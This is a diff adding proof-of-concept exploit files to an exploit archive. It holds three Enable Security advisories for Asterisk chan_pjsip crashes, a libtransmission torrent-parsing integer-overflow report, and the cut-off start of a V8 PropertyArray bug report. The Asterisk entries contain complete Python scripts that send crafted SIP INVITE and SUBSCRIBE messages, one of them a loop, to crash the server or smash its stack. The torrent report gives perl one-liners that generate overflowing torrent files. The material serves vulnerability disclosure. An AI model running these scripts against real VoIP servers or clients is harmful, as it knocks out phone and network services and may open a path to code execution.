Call-ID: 5493d4c9-8248-4c26-a63c-ee74bcf3e1e8
CSeq: 2 INVITE
Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bK5493d4c9-8248-4c26-a63c-ee74bcf3e1e8
Contact: <sip:5678@172.17.0.1>
Content-Type: application/sdp
Content-Length: 115
v=0
o=- 1061502179 1061502179 IN IP4 172.17.0.1
s=Asterisk
c=IN IP4 172.17.0.2
m=audio 17002 RTP/AVP 4294967296
```
The problematic SDP section is:
```
m=audio 17000 RTP/AVP 4294967296
```
Notes:
- authentication may be required
- the destination SIP address should match a valid extension in the dialplan
To facilitate this process we wrote the following python program to reproduce this issue:
'''
python
import socket
import re
import md5
import uuid
SERVER_IP = "127.0.0.1"
SERVER_PORT = 5060
UDP_IP = "0.0.0.0"
UDP_PORT = 13940
USERNAME = "5678"
PASSWORD = "5678"
INVITE_USERNAME = "5678"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((UDP_IP, UDP_PORT))
while True:
callid = str(uuid.uuid4())
fmt = 4294967296
sdpbody = "v=0\r\n" \
"o=- 1061502179 1061502179 IN IP4 172.17.0.1\r\n" \
"s=Asterisk\r\n" \
"c=IN IP4 172.17.0.2\r\n" \
"m=audio 17002 RTP/AVP %s" % fmt
msg="INVITE sip:%s@%s:%i SIP/2.0\r\n" \
"To: <sip:%s@%s:%i>\r\n" \
"From: Test <sip:%s@%s:%s>\r\n" \
"Call-ID: %s\r\n" \
"CSeq: 2 INVITE\r\n" \
"Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
"Contact: <sip:%s@172.17.0.1>\r\n" \
"Content-Type: application/sdp\r\n" \
"{{AUTH}}" \
"Content-Length: %i\r\n" \
"\r\n" % (
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
USERNAME, SERVER_IP, SERVER_PORT,
callid, callid,
USERNAME, len(sdpbody)
) + \
sdpbody
sock.sendto(msg.replace("{{AUTH}}", ""), (SERVER_IP, SERVER_PORT))
data, addr = sock.recvfrom(10240)
if data.startswith("SIP/2.0 401"):
for line in data.split('\r\n'):
if line.startswith("WWW-Authenticate"):
content = line.split(':', 2)[1].strip()
realm = re.search("realm=\"([a-z]+)\"", content).group(1)
nonce = re.search("nonce=\"([a-z0-9\/]+)\"", content).group(1)
ha1 = md5.new(USERNAME + ":" + realm + ":" + PASSWORD).hexdigest()
uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
ha2 = md5.new("INVITE:" + uri).hexdigest()
r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()
auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
"realm=\"%s\"," % (realm) + \
"nonce=\"%s\"," % (nonce) + \
"uri=\"%s\"," % (uri) + \
"response=\"%s\"," % (r) + \
"algorithm=md5\r\n"
sock.sendto(msg.replace("{{AUTH}}", auth), (SERVER_IP, SERVER_PORT))
'''
The loop is required since a crash might not occur immediately.
This security issue was discovered through the use of simple fuzzing with [Radamsa](https://github.com/aoh/radamsa) and our internal toolset.
### GDB backtrace result
```
gdb --args /opt/asterisk/sbin/asterisk -fcvvv
[Jan 2 16:07:36] DEBUG[45]: res_pjsip_session.c:743 handle_negotiated_sdp_session_media: Applied negotiated SDP media stream 'audio' using audio SDP handler
[Jan 2 16:07:36] ERROR[45]: pjproject:0 <?>: except.c .!!!FATAL: unhandled exception PJLIB/No memory!
Thread 26 "asterisk" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff0297700 (LWP 45)]
__longjmp_chk (env=env@entry=0x0, val=val@entry=1) at ../setjmp/longjmp.c:32
32 ../setjmp/longjmp.c: No such file or directory.
(gdb) bt
#0 __longjmp_chk (env=env@entry=0x0, val=val@entry=1) at ../setjmp/longjmp.c:32
#1 0x00007ffff78ed4ae in pj_throw_exception_ (exception_id=1) at ../src/pj/except.c:54
#2 0x00007ffff7868070 in pool_callback (pool=<optimized out>, size=<optimized out>) at ../src/pjsip/sip_endpoint.c:143
#3 0x00007ffff78f1a93 in pj_pool_create_block (size=1407375809856000, pool=0x7fff8c002c90) at ../src/pj/pool.c:63
#4 pj_pool_allocate_find (pool=0x7fff8c002c90, size=1407375809852724) at ../src/pj/pool.c:138
#5 0x00007ffff78fbb75 in pj_strdup (pool=pool@entry=0x7fff8c002c90, dst=dst@entry=0x7fff8c027638, src=src@entry=0x7fff8c025638) at ../include/pj/string_i.h:41
#6 0x00007ffff78b287e in pjmedia_sdp_media_clone (pool=pool@entry=0x7fff8c002c90, rhs=0x7fff8c025608) at ../src/pjmedia/sdp.c:691
#7 0x00007ffff78b4069 in pjmedia_sdp_session_clone (pool=pool@entry=0x7fff8c002c90, rhs=0x7fff8c01cdb8) at ../src/pjmedia/sdp.c:1422
#8 0x00007ffff7847f31 in create_sdp_body (c_sdp=<optimized out>, pool=0x7fff8c002c90) at ../src/pjsip-ua/sip_inv.c:1722
#9 process_answer (inv=inv@entry=0x7fff8c009f28, st_code=st_code@entry=200, local_sdp=local_sdp@entry=0x0, tdata=0x7fff8c002d38, tdata=0x7fff8c002d38) at ../src/pjsip-ua/sip_inv.c:2257
#10 0x00007ffff7848681 in pjsip_inv_answer (inv=0x7fff8c009f28, st_code=st_code@entry=200, st_text=st_text@entry=0x0, local_sdp=local_sdp@entry=0x0, p_tdata=p_tdata@entry=0x7ffff0296d10) at ../src/pjsip-ua/sip_inv.c:2393
#11 0x00007fff6b0f8f77 in answer (data=0x7fff8c00b298) at chan_pjsip.c:660
#12 0x00007ffff17cb180 in sync_task (data=0x7ffff290c510) at res_pjsip.c:4270
#13 0x00000000005fb3be in ast_taskprocessor_execute (tps=tps@entry=0x1dd6298) at taskprocessor.c:963
#14 0x0000000000602610 in execute_tasks (data=0x1dd6298) at threadpool.c:1322
#15 0x00000000005fb3be in ast_taskprocessor_execute (tps=0x1a401b8) at taskprocessor.c:963
#16 0x0000000000602af0 in threadpool_execute (pool=0x1ae0e88) at threadpool.c:351
#17 worker_active (worker=0x7fff94000948) at threadpool.c:1105
#18 worker_start (arg=arg@entry=0x7fff94000948) at threadpool.c:1024
#19 0x000000000060d4bd in dummy_start (data=<optimized out>) at utils.c:1257
#20 0x00007ffff5e3d6ba in start_thread (arg=0x7ffff0297700) at pthread_create.c:333
#21 0x00007ffff54263dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
```
## Solutions and recommendations
Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
'''

187
exploits/linux/dos/44183.py Executable file
View file

@ -0,0 +1,187 @@
'''
# Segmentation fault occurs in asterisk with an invalid SDP fmtp attribute
- Authors:
- Alfred Farrugia <alfred@enablesecurity.com>
- Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip`
- References: AST-2018-003
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-02-asterisk-pjsip-sdp-invalid-fmtp-segfault/>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-003.html>
- Timeline:
- Issue reported to vendor: 2018-01-15
- Vendor patch made available to us: 2018-02-05
- Vendor advisory published: 2018-02-21
- Enable Security advisory: 2018-02-22
## Description
A specially crafted SDP message body with an invalid fmtp attribute causes a
segmentation fault in asterisk using `chan_pjsip`.
## Impact
Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use.
## How to reproduce the issue
The following SIP message was used to reproduce the issue:
```
INVITE sip:5678@127.0.0.1:5060 SIP/2.0
To: <sip:5678@127.0.0.1:5060>
From: Test <sip:5678@127.0.0.1:5060>
Call-ID: adc9caea-2d0a-40af-9de5-1dd21387e03a
CSeq: 2 INVITE
Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bKadc9caea-2d0a-40af-9de5-1dd21387e03a
Contact: <sip:5678@172.17.0.1>
Content-Type: application/sdp
Content-Length: 228
v=0
o=- 1061502179 1061502179 IN IP4 172.17.0.1
s=Asterisk
c=IN IP4 172.17.0.1
t=0 0
m=audio 17000 RTP/AVP 9 0 101
a=rtpmap:8 alaw/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:101 telephone-event/8000
a=fmtp\x00:101 0-16
a=sendrecv
```
Notes:
- `\x00` should be replaced by the null character
- authentication may be required
- the destination SIP address should match a valid extension in the dialplan.
To facilitate this process we wrote the following python program to reproduce this issue:
'''
python
import socket
import re
import md5
import uuid
SERVER_IP = "127.0.0.1"
SERVER_PORT = 5060
UDP_IP = "0.0.0.0"
UDP_PORT = 13940
USERNAME = "5678"
PASSWORD = "5678"
INVITE_USERNAME = "5678"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((UDP_IP, UDP_PORT))
callid = str(uuid.uuid4())
sdpbody = "v=0\r\no=- 1061502179 1061502179 IN IP4 172.17.0.1\r\n" \
"s=Asterisk\r\n" \
"c=IN IP4 172.17.0.1\r\n" \
"t=0 0\r\n" \
"m=audio 17000 RTP/AVP 9 0 101\r\n" \
"a=rtpmap:8 alaw/8000\r\n" \
"a=rtpmap:0 PCMU/8000\r\n" \
"a=rtpmap:101 telephone-event/8000\r\n" \
"a=fmtp\x00:101 0-16\r\n"\
"a=sendrecv"
msg="INVITE sip:%s@%s:%i SIP/2.0\r\n" \
"To: <sip:%s@%s:%i>\r\n" \
"From: Test <sip:%s@%s:%s>\r\n" \
"Call-ID: %s\r\n" \
"CSeq: 2 INVITE\r\n" \
"Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
"Contact: <sip:%s@172.17.0.1>\r\n" \
"Content-Type: application/sdp\r\n" \
"{{AUTH}}" \
"Content-Length: %i\r\n" \
"\r\n" % (
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
USERNAME, SERVER_IP, SERVER_PORT,
callid, callid,
USERNAME, len(sdpbody)
) + \
sdpbody
sock.sendto(msg.replace("{{AUTH}}", ""), (SERVER_IP, SERVER_PORT))
data, addr = sock.recvfrom(10240)
if data.startswith("SIP/2.0 401"):
for line in data.split('\r\n'):
if line.startswith("WWW-Authenticate"):
content = line.split(':', 2)[1].strip()
realm = re.search("realm=\"([a-z]+)\"", content).group(1)
nonce = re.search("nonce=\"([a-z0-9\/]+)\"", content).group(1)
ha1 = md5.new(USERNAME + ":" + realm + ":" + PASSWORD).hexdigest()
uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
ha2 = md5.new("INVITE:" + uri).hexdigest()
r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()
auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
"realm=\"%s\"," % (realm) + \
"nonce=\"%s\"," % (nonce) + \
"uri=\"%s\"," % (uri) + \
"response=\"%s\"," % (r) + \
"algorithm=md5\r\n"
sock.sendto(msg.replace("{{AUTH}}", auth), (SERVER_IP, SERVER_PORT))
'''
This security issue was discovered through the use of simple fuzzing with [Radamsa](https://github.com/aoh/radamsa) and our internal toolset.
### GDB backtrace result
```
Thread 197 "asterisk" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff65e57700 (LWP 10595)]
pjmedia_sdp_attr_get_fmtp (attr=<optimized out>, fmtp=fmtp@entry=0x7fff65e56430) at ../src/pjmedia/sdp.c:350
350 while (pj_isdigit(*p) && p!=end)
(gdb) bt
#0 pjmedia_sdp_attr_get_fmtp (attr=<optimized out>, fmtp=fmtp@entry=0x7fff65e56430) at ../src/pjmedia/sdp.c:350
#1 0x00007fff6bf49070 in get_codecs (session_media=0x7fff74799540, codecs=0x7fff65e56450, stream=0x7fff97f99de0, session=0x7fff74581688) at res_pjsip_sdp_rtp.c:276
#2 set_caps (session=session@entry=0x7fff74581688, session_media=session_media@entry=0x7fff74799540, session_media_transport=0x7fff74799540, stream=stream@entry=0x7fff97f99de0, is_offer=is_offer@entry=1, asterisk_stream=asterisk_stream@entry=0x7fff747a03b0)
at res_pjsip_sdp_rtp.c:352
#3 0x00007fff6bf4b2d7 in negotiate_incoming_sdp_stream (session=0x7fff74581688, session_media=0x7fff74799540, sdp=<optimized out>, index=<optimized out>, asterisk_stream=0x7fff747a03b0) at res_pjsip_sdp_rtp.c:1185
#4 0x00007ffff1a16bb9 in handle_incoming_sdp (session=session@entry=0x7fff74581688, sdp=0x7fff97f99870) at res_pjsip_session.c:671
#5 0x00007ffff1a1a721 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2871
#6 handle_new_invite_request (rdata=0x7fff573f88d8) at res_pjsip_session.c:2966
#7 session_on_rx_request (rdata=0x7fff573f88d8) at res_pjsip_session.c:3030
#8 0x00007ffff7868df7 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff573f88d8, p=p@entry=0x7ffff1a0ace0 <param>, p_handled=p_handled@entry=0x7fff65e56d44) at ../src/pjsip/sip_endpoint.c:887
#9 0x00007ffff17e009f in distribute (data=0x7fff573f88d8) at res_pjsip/pjsip_distributor.c:903
#10 0x00000000005fb3be in ast_taskprocessor_execute (tps=tps@entry=0x1dc33a8) at taskprocessor.c:963
#11 0x0000000000602610 in execute_tasks (data=0x1dc33a8) at threadpool.c:1322
#12 0x00000000005fb3be in ast_taskprocessor_execute (tps=0x1a39488) at taskprocessor.c:963
#13 0x0000000000602af0 in threadpool_execute (pool=0x1a37ca8) at threadpool.c:351
#14 worker_active (worker=0x7fff9457ccd8) at threadpool.c:1105
#15 worker_start (arg=arg@entry=0x7fff9457ccd8) at threadpool.c:1024
#16 0x000000000060d4bd in dummy_start (data=<optimized out>) at utils.c:1257
#17 0x00007ffff5e3d6ba in start_thread (arg=0x7fff65e57700) at pthread_create.c:333
#18 0x00007ffff54263dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
```
## Solutions and recommendations
Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
'''

234
exploits/linux/dos/44184.py Executable file
View file

@ -0,0 +1,234 @@
'''
# SUBSCRIBE message with a large Accept value causes stack corruption
- Authors:
- Alfred Farrugia <alfred@enablesecurity.com>
- Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip`
- Tested vulnerable versions: 15.2.0, 13.19.0, 14.7.5, 13.11.2
- References: AST-2018-004, CVE-2018-7284
- Advisory URL: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-01-asterisk-pjsip-subscribe-stack-corruption>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-004.html>
- Timeline:
- Issue reported to vendor: 2018-01-30
- Vendor patch made available to us: 2018-02-06
- Vendor advisory published: 2018-02-21
- Enable Security advisory: 2018-02-22
## Description
A large SUBSCRIBE message with multiple malformed `Accept` headers will crash Asterisk due to stack corruption.
## Impact
Abuse of this vulnerability leads to denial of service in Asterisk when `chan_pjsip` is in use. Brief analysis indicates that this is an exploitable vulnerability that may lead to remote code execution.
## How to reproduce the issue
The following SIP message was used to reproduce the issue:
```
SUBSCRIBE sip:3000@127.0.0.1:5060 SIP/2.0
To: <sip:3000@127.0.0.1:5060>
From: Test <sip:3000@127.0.0.1:5060>
Call-ID: 1627b84b-b57d-4256-a748-30d01d242199
CSeq: 2 SUBSCRIBE
Via: SIP/2.0/TCP 172.17.0.1:10394;branch=z9hG4bK1627b84b-b57d-4256-a748-30d01d242199
Contact: <sip:3000@172.17.0.1>
Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(REPEAT ACCEPT FOR 50 TIMES)
Event: message-summary
Allow: Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE
Authorization: Digest username="3000",realm="asterisk",nonce="1517181436/80170188d05f4af45b8530366c8e7e5e",uri="sip:127.0.0.1:5060",response="a4a88b777731349899227dc3170efdcf",algorithm=md5
Content-Length: 0
```
Notes:
- authentication may be required
The following script was used to reproduce the issue:
'''
python
#!/usr/bin/env python
import socket
import ssl
import re
import md5
import uuid
PROTO = "udp"
SERVER_IP = "127.0.0.1"
SERVER_PORT = 5060
USERNAME = "3000"
PASSWORD = "3000"
SUBSCRIBE_USERNAME = "3000"
# default to SIP TCP
socktype = socket.SOCK_STREAM
if PROTO == "udp":
socktype = socket.SOCK_DGRAM
sock = socket.socket(socket.AF_INET, socktype)
if PROTO == "tls":
sock = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1)
sock.connect((SERVER_IP, SERVER_PORT))
callid = str(uuid.uuid4())
msg = "SUBSCRIBE sip:%s@%s:%i SIP/2.0\r\n" \
"To: <sip:%s@%s:%i>\r\n" \
"From: Test <sip:%s@%s:%s>\r\n" \
"Call-ID: %s\r\n" \
"CSeq: 2 SUBSCRIBE\r\n" \
"Via: SIP/2.0/TCP 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
"Contact: <sip:%s@172.17.0.1>\r\n" \
"Accept: application/simple-message-summary\r\n" \
"Event: message-summary\r\n" \
"Allow: Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE\r\n" \
"{{AUTH}}" \
"Content-Length: 0\r\n" \
"\r\n" % (
SUBSCRIBE_USERNAME, SERVER_IP, SERVER_PORT,
SUBSCRIBE_USERNAME, SERVER_IP, SERVER_PORT,
USERNAME, SERVER_IP, SERVER_PORT,
callid, callid,
USERNAME)
sock.sendall(msg.replace("{{AUTH}}", ""))
data = sock.recv(10240)
if data.startswith("SIP/2.0 401"):
for line in data.split('\r\n'):
if line.startswith("WWW-Authenticate"):
content = line.split(':', 2)[1].strip()
realm = re.search("realm=\"([a-z]+)\"", content).group(1)
nonce = re.search("nonce=\"([a-z0-9\/]+)\"", content).group(1)
ha1 = md5.new(USERNAME + ":" + realm + ":" + PASSWORD).hexdigest()
uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
ha2 = md5.new("SUBSCRIBE:" + uri).hexdigest()
r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()
auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
"realm=\"%s\"," % (realm) + \
"nonce=\"%s\"," % (nonce) + \
"uri=\"%s\"," % (uri) + \
"response=\"%s\"," % (r) + \
"algorithm=md5\r\n"
print(auth)
newmsg = ""
for line in msg.split('\r\n'):
if line.startswith('Accept'):
for _ in range(64):
newmsg += 'Accept: ' + 'A' * 8 + '\r\n'
else:
newmsg += line + '\r\n'
newmsg = newmsg.replace("{{AUTH}}", auth)
print(newmsg)
sock.sendall(newmsg)
'''
GDB Output:
```
2872 if (expires_header) {
(gdb) bt
#0 0x00007ffff1618000 in pubsub_on_rx_subscribe_request (rdata=rdata@entry=0x7fffe00132f8) at res_pjsip_pubsub.c:2872
#1 0x00007ffff1618938 in pubsub_on_rx_request (rdata=0x7fffe00132f8) at res_pjsip_pubsub.c:3559
#2 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=0x4141414141414141, p=<optimized out>,
p_handled=0x7ffff0480d44) at ../src/pjsip/sip_endpoint.c:893
#3 0x00007ffff11ca200 in strcpy (__src=0x7fffe00132f8 "\300.", __dest=0x0) at /usr/include/x86_64-linux-gnu/bits/string3.h:110
#4 record_serializer (tdata=0x7fffe00095f0) at res_pjsip/pjsip_distributor.c:92
#5 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x769a652ff4df0300, tps@entry=0xff0348) at taskprocessor.c:963
#6 0x0000000000603960 in execute_tasks (data=0xff0348) at threadpool.c:1322
#7 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x958d58) at taskprocessor.c:963
#8 0x0000000000603e40 in threadpool_execute (pool=0x957f98) at threadpool.c:351
#9 worker_active (worker=0x7fffa0000fa8) at threadpool.c:1105
#10 worker_start (arg=0x7fffa0000fa8) at threadpool.c:1024
#11 0x000000000060ed00 in __ast_malloc (file=0x6753b0 "uri.c", func=<optimized out>, lineno=307, len=<optimized out>)
at /usr/local/src/asterisk-15.2.0/include/asterisk/utils.h:535
#12 ast_uri_make_host_with_port (uri=<optimized out>) at uri.c:307
#13 0x00007fffa0000c20 in ?? ()
#14 0x76f0f5cbfb310371 in ?? ()
#15 0x890f159a3c370371 in ?? ()
#16 0x00007fff00000000 in ?? ()
#17 0x00007ffff0480ef0 in ?? ()
#18 0x4141414141414141 in ?? ()
#19 0x00007ffff5241100 in arena_thread_freeres () at arena.c:927
#20 0x769a652ff4df0300 in ?? ()
#21 0x0000000000000000 in ?? ()
```
By increasing the amount of `Accept` headers in the python script, we see stack smashing actually occurring. Although this may not work on UDP due to packet limitations, it has been verified to work on TLS/TCP. The above script would need to be slightly modified to create 64 `Accept` headers each with a value of 100 bytes, as follows:
```python
for _ in range(64):
newmsg += 'Accept: ' + 'A' * 100 + '\r\n'
```
GDB Output:
```
*** stack smashing detected ***: /opt/asterisk/sbin/asterisk terminated
Thread 25 "asterisk" received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff0481700 (LWP 129)]
0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
#1 0x00007ffff510302a in __GI_abort () at abort.c:89
#2 0x00007ffff51437ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff525b49f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff51e515c in __GI___fortify_fail (msg=<optimized out>, msg@entry=0x7ffff525b481 "stack smashing detected") at fortify_fail.c:37
#4 0x00007ffff51e5100 in __stack_chk_fail () at stack_chk_fail.c:28
#5 0x00007ffff1613be2 in subscription_get_generator_from_rdata (handler=<optimized out>, handler=<optimized out>, rdata=<optimized out>) at res_pjsip_pubsub.c:755
#6 0x4141414141414141 in ?? ()
#7 0x4141414141414141 in ?? ()
#8 0x4141414141414141 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x0041414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x4141414141414141 in ?? ()
#18 0x4141414141414141 in ?? ()
#19 0x4141414141414141 in ?? ()
#20 0x0041414141414141 in ?? ()
#21 0x4141414141414141 in ?? ()
#22 0x4141414141414141 in ?? ()
#23 0x4141414141414141 in ?? ()
#24 0x4141414141414141 in ?? ()
#25 0x4141414141414141 in ?? ()
#26 0x4141414141414141 in ?? ()
#27 0x4141414141414141 in ?? ()
#28 0x0041414141414141 in ?? ()
#29 0x4141414141414141 in ?? ()
#30 0x4141414141414141 in ?? ()
#31 0x4141414141414141 in ?? ()
```
This security issue was discovered through the use of simple fuzzing with [Radamsa](https://github.com/aoh/radamsa) and our internal toolset.
## Solutions and recommendations
Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There are no
warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
'''

98
exploits/multiple/dos/44178.txt Normal file
View file

@ -0,0 +1,98 @@
I took a look at torrent file parsing in libtransmission, there are a few integer overflows because the tr_new/tr_new0 allocation wrappers don't handle overflow.
#define tr_new(struct_type, n_structs) \
((struct_type *) tr_malloc (sizeof (struct_type) * ((size_t)(n_structs))))
#define tr_new0(struct_type, n_structs) \
((struct_type *) tr_malloc0 (sizeof (struct_type) * ((size_t)(n_structs))))
#define tr_renew(struct_type, mem, n_structs) \
((struct_type *) tr_realloc ((mem), sizeof (struct_type) * ((size_t)(n_structs))))
Here is one example when parsing the files dictionary:
static const char*
parseFiles (tr_info * inf, tr_variant * files, const tr_variant * length)
{
int64_t len;
...
inf->isFolder = true;
inf->fileCount = tr_variantListSize (files);
inf->files = tr_new0 (tr_file, inf->fileCount); <--
Here fileCount is just the number of elements in a list, you can make a list containing empty dictionaries like this "ldededededede...e".
Here are a few more:
static const char*
getannounce (tr_info * inf, tr_variant * meta)
{
...
for (i=0; i<numTiers; i++)
n += tr_variantListSize (tr_variantListChild (tiers, i));
trackers = tr_new0 (tr_tracker_info, n); <--
static void
geturllist (tr_info * inf, tr_variant * meta)
{
...
const int n = tr_variantListSize (urls);
inf->webseedCount = 0;
inf->webseeds = tr_new0 (char*, n); <--
static const char*
tr_metainfoParseImpl (const tr_session * session,
tr_info * inf,
bool * hasInfoDict,
size_t * infoDictLength,
const tr_variant * meta_in)
...
inf->pieceCount = len / SHA_DIGEST_LENGTH;
inf->pieces = tr_new0 (tr_piece, inf->pieceCount); <--
Because these are macros, I'm not sure how you would prefer to fix these. If you want to keep the macros, you could write them like this:
#define tr_new(struct_type, n_structs) \
((struct_type*)((SIZE_MAX / sizeof(struct_type)) > n_structs) ? NULL : tr_malloc(sizeof(struct_type) * (size_t)(n_structs)))
They're getting a little bit unwieldy though, and now evaluate n_structs more than once, so maybe inline static functions would be better.
Another bug, containerReserve() doesn't check for integer overflow or allocation failure:
static void
containerReserve (tr_variant * v, size_t count)
{
...
v->val.l.vals = tr_renew (tr_variant, v->val.l.vals, n); <---
v->val.l.alloc = n;
...
}
Another bug is that tr_sha1 uses signed integers for length, rather than size_t:
bool
tr_sha1 (uint8_t * hash,
const void * data1,
int data1_length,
...)
This can cause memory corruption with very large torrents.
Here are some simple testcase for 32bit systems:
$ perl -e 'print "d4:infod4:name4:name12:piece lengthi1e5:filesl","d4:pathl4:filee6:lengthi1ee","de"x107374183,"e","6:pieces0:ee"' > overflow.torrent
$ perl -e 'print "d4:infod4:name4:root12:piece lengthi1e5:filesld4:pathl4:filee6:lengthi1eee6:pieces20:AAAAAAAAAAAAAAAAAAAAe13:announce-listl","l7:udp://0","0:"x134217728,"eee"' > overflow.torrent
This would make a torrent that's a 100MB or so, but would compress really well over gzip Content-Encoding.
Here is a testcase for a 64bit system, note that because of another bug in tr_loadFile you can't open very large torrents with transmission-cli (they get truncated), but you can just pass a http link to it instead:
$ perl -e 'print "d4:infod4:name4:root12:piece lengthi1e5:filesld4:pathl4:filee6:lengthi1eee","6:pieces2684354560:","A"x2684354560,"ee"' > test.torrent
$ python -m SimpleHTTPServer 8080 &
$ transmission-cli http://localhost:8080/test.torrent
The transfer can be compressed to make it a manageable size, it's about 2G otherwise.

91
exploits/multiple/dos/44179.js Normal file
View file

@ -0,0 +1,91 @@
/*
Here's a snippet of the MigrateFastToFast function which is used to create a new PropertyArray object.
int number_of_fields = new_map->NumberOfFields();
int inobject = new_map->GetInObjectProperties();
int unused = new_map->UnusedPropertyFields();
...
int total_size = number_of_fields + unused;
int external = total_size - inobject;
Handle<PropertyArray> array = isolate->factory()->NewPropertyArray(external);
The new_map variable may come from the Map::CopyWithField method.
Here's a snippet of the method.
MaybeHandle<Map> Map::CopyWithField(Handle<Map> map, Handle<Name> name,
Handle<FieldType> type,
PropertyAttributes attributes,
PropertyConstness constness,
Representation representation,
TransitionFlag flag) {
...
if (map->NumberOfOwnDescriptors() >= kMaxNumberOfDescriptors) {
return MaybeHandle<Map>();
}
DCHECK_IMPLIES(!FLAG_track_constant_fields, constness == kMutable);
Descriptor d = Descriptor::DataField(name, index, attributes, constness,
representation, wrapped_type);
Handle<Map> new_map = Map::CopyAddDescriptor(map, &d, flag);
new_map->AccountAddedPropertyField();
return new_map;
}
The Map::CopyAddDescriptor method adds one more descriptor to the map, and the AccountAddedPropertyField method may make the UnusedPropertyFields() up to 2. Since kMaxNumberOfDescriptors is 1022, new_map's NumberOfFields() can be 1022, and UnusedPropertyFields() can be 2 in certain circumstances.
This means, in the MigrateFastToFast method, the "external" variable can be 1024 which exceeds the maximum value of a ProperyArray's length which is 1023. So the created array's length() will return 0, it hits the following assert.
#
